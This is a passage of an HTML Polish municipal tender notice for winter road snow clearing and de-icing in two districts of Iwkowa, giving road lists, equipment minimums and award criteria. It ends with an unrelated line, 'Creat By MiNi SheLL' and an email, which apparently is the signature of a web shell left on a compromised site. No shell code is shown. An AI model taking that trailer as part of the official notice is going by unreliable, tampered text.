roboty dodatkowe, których nie można było przewidzieć w dniu zawarcia umowy, a nie wykonanie których uniemożliwiałoby należyte wykonanie Przedmiotu umowy,f) wystąpienia siły wyższej uniemożliwiającej wykonanie Przedmiotu umowy zgodnie z jej postanowieniami; przez siłę wyższą należy rozumieć zdarzenie zewnętrzne o charakterze niezależnym od Stron, którego Strony nie mogły przewidzieć przed zawarciem Umowy, oraz którego Strony nie mogły uniknąć ani któremu nie mogły zapobiec przy zachowaniu należytej staranności. Za siłę wyższą, warunkująca zmianę Umowy uważać się będzie w szczególności: zamieszki, strajki, nagłe załamania warunków atmosferycznych, skażenia, zakażenia lub epidemia.g) zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy, f)) w każdym przypadku, gdy zmiana jest korzystna dla Zamawiającego. </span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-10-23</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17"></span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>REJON NR I w miejscowościach Iwkowa, Połom Mały:</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zimowe utrzymanie dróg w Rejonie nr I poprzez odśnieżanie i likwidację gołoledzi w sposób zapewniający ciągłość przejazdu stosownie do istniejących warunków atmosferycznych, w pierwszej kolejności dróg oznaczonych numerami od 1-10 oraz parkingi oznaczone nr 19. W drugiej kolejności drogi oznaczone numerami od 11-17 oraz parkingi oznaczone nr 20 całodobowe patrolowanie – interwencyjne. Droga oznaczona numerem 18 tylko w sytuacjach interwencji telefonicznej. Lp.	Nazwa drogi1	Iwkowa – Dzięgielowo cała długość wraz z parkingiem k/Orlika2	Iwkowa – Skotnica odcinek pomiędzy drogą powiatową a drogą gminną Dzięgielowo3	Iwkowa – Skirłowo cała długość4	Iwkowa – Bacówka cała długość5	Iwkowa – Piekarnia cała długość wraz z parkingiem k/Kościółka6	Iwkowa – Pańskie od drogi powiatowej do ostatnich zabudowań 7	Iwkowa – Ośrodek Zdr. cała długość8	Iwkowa – k/szkoły cała długość wraz z parkingami9	Iwkowa – Pagórek, Połom Mały cała długość (do willi pod Gruszą)10	Połom Mały – Witowice cała długość (do końca granicy gminy) 11	Iwkowa – Stary Gościniec do ostatnich zabudowań12	Iwkowa – Murkowo od drogi powiatowej do P. Jana Gawełda 13	Iwkowa – Piłkówka od drogi powiatowej do zabudowań zamieszkałych całorocznie (pozostałe interwencyjnie)14	Połom Mały – Wytrzyszczka cała długość (do końca granicy gminy)15	Połom Mały – Porąbka Iwkowska (od początku drogi do końca asfaltu)16	Iwkowa Kąciny – Wytrzyszczka cała długość (do końca granicy gminy)17	Iwkowa – Kozieniec cała długość18	Iwkowa – Góry interwencyjnie od drogi powiatowej do zabudowań19	Parkingi k/Urzędu Gminy, Place w centrum Iwkowej20	Parking k/OSP Iwkowa, Parking k/Ośrodka Odśnieżanie i likwidację gołoledzi należy prowadzić: - na polecenie Wójta Gminy, Zastępcy Wójta lub upoważnionego pracownika (dotyczy odśnieżania i likwidacji gołoledzi). - bez polecenia w/w osób jeżeli luźna warstwa pokrywy śnieżnej na drodze przekracza 10 cm i nadal trwają opady śniegu lub wieje wiatr sprzyjający tworzeniu się zasp (dotyczy odśnieżania),- bez polecenia w/w osób jeżeli występuje zjawisko gołoledzi (dotyczy posypki) w szczególności na wzniesieniach, zakrętach, skrzyżowaniach, zjazdach, podjazdach, miejscach mało widocznych i innych niebezpiecznych dla ruchu odcinkach dróg. - użycie pługa wirnikowego do ośnieżania tylko na bezpośrednie (lub telefoniczne) polecenie Wójta Gminy, Zastępcy Wójta lub upoważnionego pracownika.Sprzęt:Wykonawca winien posiadać co najmniej:- dwa ciągniki: moc min. 50 kM, napęd min. 2 x 4 z pługami zawieszanymi czołowo, przygotowane do odśnieżania w tym jeden przygotowany do posypki,- jeden pług wirnikowy doczepiany lub samobieżny.Dodatkowo można zastosować – w miejscach (odcinkach) gdzie jest to możliwe samochód ciężarowy: moc min. 120 kM z pługiem zawieszanym czołowo przygotowanym do odśnieżania lub samochód ciężarowy: moc min. 120 kM przygotowany do posypki. Opisany sprzęt ma być wyposażony w łańcuchy na koła, linki holownicze, łopaty, odpowiednio oznakowany zgodnie z przepisami ruchu drogowego oraz winien być dostosowany do specyfiki usytuowania oraz szerokości dróg gminnych. Posypka:Posypka dróg materiałem uszorstniającym bez dodatku środków chemicznych, jedynie w szczególnych przypadkach na polecenie Zamawiającego dopuszczalne jest ich stosowanie. Pełne zabezpieczenie odpowiedniej ilości materiału do posypki wystarczającej na cały sezon zimowy jest w gestii Wykonawcy. Sposób potwierdzania wykonanych usług:Zamawiający zastrzega sobie prawo do zamontowania w pojazdach mechanicznych urządzeń monitorujących czas pracy sprzętu, które będą potwierdzać ilość przepracowanych godzin. Podstawą do wypłaty wynagrodzenia będzie zestawienie ilości godzin z urządzenia monitorującego.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>90620000-9, 90630000-2<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2021-03-15<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena (brutto)</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Czas reakcji w celu podjęcia interwencji</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>REJON NR II w miejscowościach: Kąty, Dobrociesz, Drużków Pusty, Porąbka Iwkowska</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zakres robót obejmuje: Zimowe utrzymanie dróg w Rejonie nr II poprzez odśnieżanie i likwidację gołoledzi w sposób zapewniający ciągłość przejazdu stosownie do istniejących warunków atmosferycznych, w pierwszej kolejności dróg oznaczonych numerami od 1-8, w drugiej kolejności drogi oznaczone numerami od 9-18 oraz całodobowe patrolowanie – interwencyjne. Lp.	Nazwa drogi1	Drużków Pusty – Porąbka Iwkowska cała droga 2	Kąty-Góry-Sechna-Dobrociesz cała długość, do granicy gminy, do P. Zelka3	Kąty – Grabie od krzyżówki z drogą gminną do posesji P. Gwiżdżów4	Kąty-Grabie-Michalczowa cała długość5	Kąty – Pasterniki – Dobrociesz od krzyżówki z drogą powiatową do skrzyżowania z drogą powiatową w Dobrocieszu 6	Kąty-Parkingi centrum7	Kąty – Sławikówka cała długość8	Drużków Pusty – Połom Mały - Kąty Zatoki cała długość+boczne9	Dobrociesz – Bieleckówka od krzyżówki z drogą gminną do posesji do P.Krzyżaków10	Dobrociesz – Kmieciówka od drogi powiatowej do linii zabudowań11	Kąty – Pasterniki od drogi powiatowej do posesji P.Midów i do P. Staszak12	Dobrociesz – Padoły do P. Bodek13	Kąty-Góry-Pasterniki do P. Andrzeja Szewczyka 14	Drużków Pusty Kamieniec od drogi powiatowej do P. Zyznawskiego15	Drużków Pusty – Rędziny 200m16	Kąty-Drużkó w Pusty od drogi gminnej na całej długości17	Drużków Pusty – Poczekaj do P. Jarzmika18	Porąbka Iwkowska-Zarzecze cała długośćOdśnieżanie i likwidację gołoledzi należy prowadzić: - na polecenie Wójta Gminy, Zastępcy Wójta lub upoważnionego pracownika (dotyczy odśnieżania i likwidacji gołoledzi). - bez polecenia w/w osób jeżeli luźna warstwa pokrywy śnieżnej na drodze przekracza 10 cm i nadal trwają opady śniegu lub wieje wiatr sprzyjający tworzeniu się zasp (dotyczy odśnieżania),- bez polecenia w/w osób jeżeli występuje zjawisko gołoledzi (dotyczy posypki) w szczególności na wzniesieniach, zakrętach, skrzyżowaniach, zjazdach, podjazdach, miejscach mało widocznych i innych niebezpiecznych dla ruchu odcinkach dróg, - użycie pługa wirnikowego do ośnieżania tylko na bezpośrednie (lub telefoniczne) polecenie Wójta Gminy, Zastępcy Wójta lub upoważnionego pracownika. Sprzęt: Wykonawca winien posiadać co najmniej:-dwa ciągniki: moc min. 80 kM, napęd min. 4 x 4 z pługami zawieszanymi czołowo, przygotowane do odśnieżania w tym jeden przygotowany do posypki,- jeden pług wirnikowy doczepiany lub samobieżnyDodatkowo można zastosować – w miejscach (odcinkach) gdzie jest to możliwe samochód ciężarowy: moc min. 120 kM z pługiem zawieszanym czołowo przygotowanym do odśnieżania lub samochód ciężarowy: moc min. 120 kM przygotowany do posypki. Opisany sprzęt ma być wyposażony w łańcuchy na koła, linki holownicze, łopaty, odpowiednio oznakowany zgodnie z przepisami ruchu drogowego oraz winien być dostosowany do specyfiki usytuowania oraz szerokości dróg gminnych.Posypka:Posypka dróg materiałem uszorstniającym bez dodatku środków chemicznych, jedynie w szczególnych przypadkach na polecenie Zamawiającego dopuszczalne jest ich stosowanie. Pełne zabezpieczenie odpowiedniej ilości materiału do posypki wystarczającej na cały sezon zimowy jest w gestii Wykonawcy. Sposób potwierdzania wykonanych robót Zamawiający zastrzega sobie prawo do zamontowania w pojazdach mechanicznych urządzeń monitorujących czas pracy sprzętu, które będą potwierdzać ilość przepracowanych godzin. Podstawą do wypłaty wynagrodzenia będzie zestawienie ilości godzin z urządzenia monitorującego.3.	Wspólny słownik zamówień (CPV)-dotyczy każdej części: KOD CPV :90620000-9 : Usługi odśnieżania90630000-2 : Usługi usuwania oblodzeń4. Zamawiający wymaga (dotyczy każdej części), aby Wykonawca lub Podwykonawca przez cały okres realizacji zamówienia zatrudniał na podstawie umowy o pracę w rozumieniu obowiązujących przepisów ustawy w tym zakresie osób wykonujących następujące czynności w trakcie realizacji zamówienia, tj. osoby kierujące pojazdami.Powyższy warunek zostanie spełniony poprzez zatrudnienie na umowę o pracę nowych pracowników lub wyznaczenie do realizacji zamówienia zatrudnionych już u Wykonawcy pracowników. Sposób dokumentowania zatrudnienia osób i uprawnienia Zamawiającego w zakresie kontroli spełnienia przez Wykonawcę wymagań, o których mowa w art. 29 ust. 3a oraz sankcje z tytułu niespełnienia tych wymagań określa projekt umowy, stanowiący załącznik nr 7 do SIWZ.Powyższy zapis nie dotyczy osób prowadzących samodzielnie działalność jednoosobową, którzy sami będą realizować przedmiot zamówienia.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>90620000-9, 90630000-2, 90630000-2<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2021-03-15<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena (brutto)</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Czas reakcji w celu podjęcia interwencji</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com